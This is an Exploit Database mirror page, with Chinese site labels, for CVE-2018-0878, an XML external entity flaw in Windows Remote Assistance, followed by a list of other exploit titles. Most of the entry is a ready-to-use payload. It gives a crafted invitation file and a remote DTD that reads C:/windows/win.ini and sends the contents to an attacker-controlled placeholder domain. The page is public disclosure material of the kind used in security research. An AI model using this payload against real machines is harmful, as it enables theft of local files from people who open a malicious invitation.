Microsoft Windows Remote Assistance – XML External Entity Injection

Exploit Database
16 阅读

作者： Nabeel Ahmed

日期： 2018-03-28
类别：
- webapps
平台：
- windows
来源：https://www.exploit-db.com/exploits/44352/

# Exploit Title: Microsoft Windows Remote Assistance XXE
# Date: 27/03/2018
# Exploit Author: Nabeel Ahmed
# Tested on: Windows 7 (x64), Windows 10 (x64)
# CVE : CVE-2018-0878
# Category: Remote Exploits

Invitation.msrcincident
------------------------
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE zsl [
<!ENTITY % remote SYSTEM "http://<yourdomain.com>/xxe.xml">
%remote;%root;%oob;]>

xxe.xml
------------------------
<!ENTITY % payload SYSTEM "file:///C:/windows/win.ini">
<!ENTITY % root "<!ENTITY &#37; oob SYSTEM 'http://<yourdomain.com>/?%payload;'> ">

Reference: https://krbtgt.pw/windows-remote-assistance-xxe-vulnerability/
Reference: Vulnerability discovered by Nabeel Ahmed (@NabeelAhmedBE) of Dimension Data (https://www.dimensiondata.com)

last Exploits
Microsoft Windows Remote Assistance – XML External Entity Injection的更多信息

Joomla! Component Freestyle FAQ Lite 1.3 – ‘faqid’ SQL Injection：
Companymaps v8.0 – Stored Cross Site Scripting (XSS)：
Joomla! Component JS Autoz 1.0.9 – SQL Injection：
phpList 2.10.9 – ‘Sajax.php’ PHP Code Injection：
Toko Lite CMS 1.5.2 – ‘edit.php’ HTTP Response Splitting：
ColdBookmarks 1.22 – SQL Injection：
CubeCart 3.0.4 – SQL Injection：
TP-Link TL-WR340G / TL-WR340GD – Multiple Vulnerabilities：